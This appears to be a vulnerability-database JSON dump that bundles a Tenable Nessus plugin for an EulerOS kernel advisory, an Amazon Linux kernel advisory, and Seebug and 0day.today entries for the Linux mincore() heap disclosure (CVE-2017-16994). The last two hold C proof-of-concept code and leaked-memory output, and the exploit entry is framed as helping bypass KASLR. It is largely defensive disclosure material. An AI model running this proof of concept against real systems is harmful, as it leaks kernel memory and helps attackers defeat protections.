SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:56:36", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux kernel,\n before 4.13.8, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533)\n\n - The cdc_parse_cdc_header() function in\n 'drivers/usb/core/message.c' in the Linux kernel,\n before 4.13.6, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is unlikely.(CVE-2017-16534)\n\n - The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel can allow\n a local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16535)\n\n - The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16536)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - The drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux\n kernel, through 4.13.11, allows local users to cause a\n denial of service (general protection fault and system\n crash) or possibly have unspecified other impact via a\n crafted USB device, related to a missing warm-start\n check and incorrect attach timing\n (dm04_lme2510_frontend_attach versus\n dm04_lme2510_tuner).(CVE-2017-16538)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel,\n through 4.13.11, allows local users to cause a denial\n of service (ims_pcu_parse_cdc_data out-of-bounds read\n and system crash) or possibly have unspecified other\n impact via a crafted USB device.(CVE-2017-16645)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The Linux kernel is vulerable to a use-after-free flaw\n when Transformation User configuration\n interface(CONFIG_XFRM_USER) compile-time configuration\n were enabled. This vulnerability occurs while closing a\n xfrm netlink socket in xfrm_dump_policy_done. A\n user/process could abuse this flaw to potentially\n escalate their privileges on a system.(CVE-2017-16939)\n\n - The net/netfilter/nfnetlink_cthelper.c function in the\n Linux kernel through 4.14.4 does not require the\n CAP_NET_ADMIN capability for new, get, and del\n operations. This allows local users to bypass intended\n access restrictions because the nfnl_cthelper_list data\n structure is shared across all net\n namespaces.(CVE-2017-17448)\n\n - The __netlink_deliver_tap_skb function in\n net/netlink/af_netlink.c in the Linux kernel, through\n 4.14.4, does not restrict observations of Netlink\n messages to a single net namespace, when CONFIG_NLMON\n is enabled. This allows local users to obtain sensitive\n information by leveraging the CAP_NET_ADMIN capability\n to sniff an nlmon interface for all Netlink activity on\n the system.(CVE-2017-17449)\n\n - net/netfilter/xt_osf.c in the Linux kernel through\n 4.14.4 does not require the CAP_NET_ADMIN capability\n for add_callback and remove_callback operations. This\n allows local users to bypass intended access\n restrictions because the xt_osf_fingers data structure\n is shared across all network\n namespaces.(CVE-2017-17450)\n\n - The usb_destroy_configuration() function, in\n 'drivers/usb/core/config.c' in the USB core subsystem,\n in the Linux kernel through 4.14.5 does not consider\n the maximum number of configurations and interfaces\n before attempting to release resources. This allows\n local users to cause a denial of service, due to\n out-of-bounds write access, or possibly have\n unspecified other impact via a crafted USB device. Due\n to the nature of the flaw, privilege escalation cannot\n be fully ruled out, although we believe it is\n unlikely.(CVE-2017-17558)\n\n - The Salsa20 encryption algorithm in the Linux kernel,\n before 4.14.8, does not correctly handle zero-length\n inputs. This allows a local attacker the ability to use\n the AF_ALG-based skcipher interface to cause a denial\n of service (uninitialized-memory free and kernel crash)\n or have an unspecified other impact by executing a\n crafted sequence of system calls that use the\n blkcipher_walk API. Both the generic implementation\n (crypto/salsa20_generic.c) and x86 implementation\n (arch/x86/crypto/salsa20_glue.c) of Salsa20 are\n vulnerable.(CVE-2017-17805)\n\n - The HMAC implementation (crypto/hmac.c) in the Linux\n kernel, before 4.14.8, does not validate that the\n underlying cryptographic hash algorithm is unkeyed.\n This allows a local attacker, able to use the\n AF_ALG-based hash interface\n (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash\n algorithm (CONFIG_CRYPTO_SHA3), to cause a kernel stack\n buffer overflow by executing a crafted sequence of\n system calls that encounter a missing SHA-3\n initialization.(CVE-2017-17806)\n\n - The KEYS subsystem in the Linux kernel omitted an\n access-control check when writing a key to the current\n task's default keyring, allowing a local user to bypass\n security checks to the keyring. This compromises the\n validity of the keyring for those who rely on\n it.(CVE-2017-17807)\n\n - A flaw was found in the Linux kernel's implementation\n of i8042 serial ports. An attacker could cause a kernel\n panic if they are able to add and remove devices as the\n module is loaded.(CVE-2017-18079)\n\n - The Linux kernel, before version 4.14.3, is vulnerable\n to a denial of service in\n drivers/md/dm.c:dm_get_from_kobject() which can be\n caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM\n devices. Only privileged local users (with\n CAP_SYS_ADMIN capability) can directly perform the\n ioctl operations for dm device creation and removal and\n this would typically be outside the direct control of\n the unprivileged attacker.(CVE-2017-18203)\n\n - The madvise_willneed function in the Linux kernel\n allows local users to cause a denial of service\n (infinite loop) by triggering use of MADVISE_WILLNEED\n for a DAX mapping.(CVE-2017-18208)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1501)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-18079", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-17448", "CVE-2017-16533", "CVE-2017-16536", "CVE-2017-18208", "CVE-2017-16939", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16538", "CVE-2017-16534", "CVE-2017-17807", "CVE-2017-16644", "CVE-2017-16645", "CVE-2017-17806"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1501.NASL", "href": "https://www.tenable.com/plugins/nessus/124824", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124824);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-16533\",\n \"CVE-2017-16534\",\n \"CVE-2017-16535\",\n \"CVE-2017-16536\",\n \"CVE-2017-16537\",\n \"CVE-2017-16538\",\n \"CVE-2017-16643\",\n \"CVE-2017-16644\",\n \"CVE-2017-16645\",\n \"CVE-2017-16649\",\n \"CVE-2017-16650\",\n \"CVE-2017-16939\",\n \"CVE-2017-17448\",\n \"CVE-2017-17449\",\n \"CVE-2017-17450\",\n \"CVE-2017-17558\",\n \"CVE-2017-17805\",\n \"CVE-2017-17806\",\n \"CVE-2017-17807\",\n \"CVE-2017-18079\",\n \"CVE-2017-18203\",\n \"CVE-2017-18208\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1501)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - The usbhid_parse function in\n drivers/hid/usbhid/hid-core.c in the Linux kernel,\n before 4.13.8, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16533)\n\n - The cdc_parse_cdc_header() function in\n 'drivers/usb/core/message.c' in the Linux kernel,\n before 4.13.6, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is unlikely.(CVE-2017-16534)\n\n - The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel can allow\n a local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16535)\n\n - The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (NULL pointer dereference and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16536)\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537)\n\n - The drivers/media/usb/dvb-usb-v2/lmedm04.c in the Linux\n kernel, through 4.13.11, allows local users to cause a\n denial of service (general protection fault and system\n crash) or possibly have unspecified other impact via a\n crafted USB device, related to a missing warm-start\n check and incorrect attach timing\n (dm04_lme2510_frontend_attach versus\n dm04_lme2510_tuner).(CVE-2017-16538)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel,\n through 4.13.11, allows local users to cause a denial\n of service (ims_pcu_parse_cdc_data out-of-bounds read\n and system crash) or possibly have unspecified other\n impact via a crafted USB device.(CVE-2017-16645)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The Linux kernel is vulerable to a use-after-free flaw\n when Transformation User configuration\n interface(CONFIG_XFRM_USER) compile-time configuration\n were enabled. This vulnerability occurs while closing a\n xfrm netlink socket in xfrm_dump_policy_done. A\n user/process could abuse this flaw to potentially\n escalate their privileges on a system.(CVE-2017-16939)\n\n - The net/netfilter/nfnetlink_cthelper.c function in the\n Linux kernel through 4.14.4 does not require the\n CAP_NET_ADMIN capability for new, get, and del\n operations. This allows local users to bypass intended\n access restrictions because the nfnl_cthelper_list data\n structure is shared across all net\n namespaces.(CVE-2017-17448)\n\n - The __netlink_deliver_tap_skb function in\n net/netlink/af_netlink.c in the Linux kernel, through\n 4.14.4, does not restrict observations of Netlink\n messages to a single net namespace, when CONFIG_NLMON\n is enabled. This allows local users to obtain sensitive\n information by leveraging the CAP_NET_ADMIN capability\n to sniff an nlmon interface for all Netlink activity on\n the system.(CVE-2017-17449)\n\n - net/netfilter/xt_osf.c in the Linux kernel through\n 4.14.4 does not require the CAP_NET_ADMIN capability\n for add_callback and remove_callback operations. This\n allows local users to bypass intended access\n restrictions because the xt_osf_fingers data structure\n is shared across all network\n namespaces.(CVE-2017-17450)\n\n - The usb_destroy_configuration() function, in\n 'drivers/usb/core/config.c' in the USB core subsystem,\n in the Linux kernel through 4.14.5 does not consider\n the maximum number of configurations and interfaces\n before attempting to release resources. This allows\n local users to cause a denial of service, due to\n out-of-bounds write access, or possibly have\n unspecified other impact via a crafted USB device. Due\n to the nature of the flaw, privilege escalation cannot\n be fully ruled out, although we believe it is\n unlikely.(CVE-2017-17558)\n\n - The Salsa20 encryption algorithm in the Linux kernel,\n before 4.14.8, does not correctly handle zero-length\n inputs. This allows a local attacker the ability to use\n the AF_ALG-based skcipher interface to cause a denial\n of service (uninitialized-memory free and kernel crash)\n or have an unspecified other impact by executing a\n crafted sequence of system calls that use the\n blkcipher_walk API. Both the generic implementation\n (crypto/salsa20_generic.c) and x86 implementation\n (arch/x86/crypto/salsa20_glue.c) of Salsa20 are\n vulnerable.(CVE-2017-17805)\n\n - The HMAC implementation (crypto/hmac.c) in the Linux\n kernel, before 4.14.8, does not validate that the\n underlying cryptographic hash algorithm is unkeyed.\n This allows a local attacker, able to use the\n AF_ALG-based hash interface\n (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash\n algorithm (CONFIG_CRYPTO_SHA3), to cause a kernel stack\n buffer overflow by executing a crafted sequence of\n system calls that encounter a missing SHA-3\n initialization.(CVE-2017-17806)\n\n - The KEYS subsystem in the Linux kernel omitted an\n access-control check when writing a key to the current\n task's default keyring, allowing a local user to bypass\n security checks to the keyring. This compromises the\n validity of the keyring for those who rely on\n it.(CVE-2017-17807)\n\n - A flaw was found in the Linux kernel's implementation\n of i8042 serial ports. An attacker could cause a kernel\n panic if they are able to add and remove devices as the\n module is loaded.(CVE-2017-18079)\n\n - The Linux kernel, before version 4.14.3, is vulnerable\n to a denial of service in\n drivers/md/dm.c:dm_get_from_kobject() which can be\n caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM\n devices. Only privileged local users (with\n CAP_SYS_ADMIN capability) can directly perform the\n ioctl operations for dm device creation and removal and\n this would typically be outside the direct control of\n the unprivileged attacker.(CVE-2017-18203)\n\n - The madvise_willneed function in the Linux kernel\n allows local users to cause a denial of service\n (infinite loop) by triggering use of MADVISE_WILLNEED\n for a DAX mapping.(CVE-2017-18208)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1501\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4cf08299\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-18079\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_42\",\n \"kernel-devel-3.10.0-862.14.1.6_42\",\n \"kernel-headers-3.10.0-862.14.1.6_42\",\n \"kernel-tools-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_42\",\n \"perf-3.10.0-862.14.1.6_42\",\n \"python-perf-3.10.0-862.14.1.6_42\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-12-25T18:28:21", "description": "I found the following bug with an AFL-based fuzzer:\r\n\r\nWhen `__walk_page_range()` is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.\r\n\r\nThis bug can be reproduced with the following testcase:\r\n\r\n```\r\n$ cat mincore_test.c\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n\r\nunsigned char mcbuf[0x1000];\r\n\r\nint main(void) {\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)\r\n err(1, \"mmap\");\r\n\r\n for (int i=0; i<10000; i++) {\r\n if (mincore((void*)0x86000000, 0x1000000, mcbuf))\r\n perror(\"mincore\");\r\n write(1, mcbuf, 0x1000);\r\n }\r\n}\r\n$ gcc -o mincore_test mincore_test.c -Wall\r\n$ ./mincore_test | hexdump -C | head\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 fe 01 00 00 |................|\r\n00000010 80 49 3d 20 c6 e9 ff ff c0 49 3d 20 c6 e9 ff ff |.I= .....I= ....|\r\n00000020 00 08 3c 20 c6 e9 ff ff 40 08 3c 20 c6 e9 ff ff |..< ....@.< ....|\r\n00000030 80 08 3c 20 c6 e9 ff ff c0 08 3c 20 c6 e9 ff ff |..< ......< ....|\r\n00000040 00 09 3c 20 c6 e9 ff ff 40 09 3c 20 c6 e9 ff ff |..< ....@.< ....|\r\n00000050 80 09 3c 20 c6 e9 ff ff c0 09 3c 20 c6 e9 ff ff |..< ......< ....|\r\n00000060 00 06 3c 20 c6 e9 ff ff 40 06 3c 20 c6 e9 ff ff |..< ....@.< ....|\r\n00000070 80 06 3c 20 c6 e9 ff ff c0 06 3c 20 c6 e9 ff ff |..< ......< ....|\r\n00000080 00 07 3c 20 c6 e9 ff ff 40 07 3c 20 c6 e9 ff ff |..< ....@.< ....|\r\n00000090 80 07 3c 20 c6 e9 ff ff 80 78 84 0b c6 e9 ff ff |..< .....x......|\r\n```", "published": "2017-12-04T00:00:00", "type": "seebug", "title": "Linux: mincore() discloses uninitialized kernel heap pages(CVE-2017-16994)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16994"], "modified": "2017-12-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96915", "id": "SSV:96915", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-15115", "CVE-2017-16994", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2016-5195", "CVE-2017-1000405", "CVE-2017-16645"], "description": "**Issue Overview:**\n\nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. ([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest was to flood the I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel resulting in DoS. ([CVE-2017-1000407 __](<https://access.redhat.com/security/cve/CVE-2017-1000407>))\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16647 __](<https://access.redhat.com/security/cve/CVE-2017-16647>))\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16646 __](<https://access.redhat.com/security/cve/CVE-2017-16646>))\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16645 __](<https://access.redhat.com/security/cve/CVE-2017-16645>))\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16643 __](<https://access.redhat.com/security/cve/CVE-2017-16643>))\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call. ([CVE-2017-16994 __](<https://access.redhat.com/security/cve/CVE-2017-16994>))\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16650 __](<https://access.redhat.com/security/cve/CVE-2017-16650>))\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16649 __](<https://access.redhat.com/security/cve/CVE-2017-16649>))\n\nA vulnerability was found in the Linux kernel when peeling off an association to the socket in another network namespace. All transports in this association are not to be rehashed and keep using the old key in hashtable, thus removing transports from hashtable when closing the socket, all transports are being freed. Later on a use-after-free issue could be caused when looking up an association and dereferencing the transports. ([CVE-2017-15115 __](<https://access.redhat.com/security/cve/CVE-2017-15115>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.9.70-22.55.amzn1.i686 \n kernel-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-4.9.70-22.55.amzn1.i686 \n perf-debuginfo-4.9.70-22.55.amzn1.i686 \n kernel-tools-devel-4.9.70-22.55.amzn1.i686 \n kernel-headers-4.9.70-22.55.amzn1.i686 \n kernel-tools-4.9.70-22.55.amzn1.i686 \n kernel-devel-4.9.70-22.55.amzn1.i686 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.70-22.55.amzn1.noarch \n \n src: \n kernel-4.9.70-22.55.amzn1.src \n \n x86_64: \n kernel-tools-4.9.70-22.55.amzn1.x86_64 \n kernel-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-headers-4.9.70-22.55.amzn1.x86_64 \n kernel-4.9.70-22.55.amzn1.x86_64 \n perf-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64 \n perf-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-4.9.70-22.55.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-12-21T00:02:00", "published": "2017-12-21T00:02:00", "id": "ALAS-2017-937", "href": "https://alas.aws.amazon.com/ALAS-2017-937.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-04T21:28:34", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2018-03-20T00:00:00", "type": "zdt", "title": "Linux Kernel - mincore() Heap Page Disclosure (PoC) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16994"], "modified": "2018-03-20T00:00:00", "href": "https://0day.today/exploit/description/30016", "id": "1337DAY-ID-30016", "sourceData": "/*\r\n * The source is modified from \r\n * https://bugs.chromium.org/p/project-zero/issues/detail?id=1431\r\n * I try to find out infomation useful from the infoleak\r\n * The kernel address can be easily found out from the uninitialized memory\r\n * leaked from kernel, which can help bypass kaslr\r\n */\r\n \r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n \r\nint main(void) {\r\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n int right = 1;\r\n unsigned long addr = 0;\r\n \r\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n if 